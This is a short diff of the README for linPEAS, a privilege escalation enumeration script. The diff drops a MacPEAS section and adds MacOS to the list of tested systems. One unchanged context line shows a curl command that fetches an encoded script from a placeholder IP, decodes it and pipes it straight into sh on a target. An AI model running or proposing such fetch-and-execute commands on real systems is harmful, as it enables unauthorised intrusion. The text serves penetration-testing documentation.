peass-ng/PEASS-ng/linPEAS/README.md

 curl 10.10.10.10/lp.enc | base64 -d | sh #Download from the victim
 ```

-## MacPEAS

-Just execute `linpeas.sh` in a MacOS system and the **MacPEAS version will be automatically executed!!**

 ## Basic Information

-The goal of this script is to search for possible **Privilege Escalation Paths** (tested in Debian, CentOS, FreeBSD and OpenBSD).
+The goal of this script is to search for possible **Privilege Escalation Paths** (tested in Debian, CentOS, FreeBSD, OpenBSD and MacOS).

 This script doesn't have any dependency.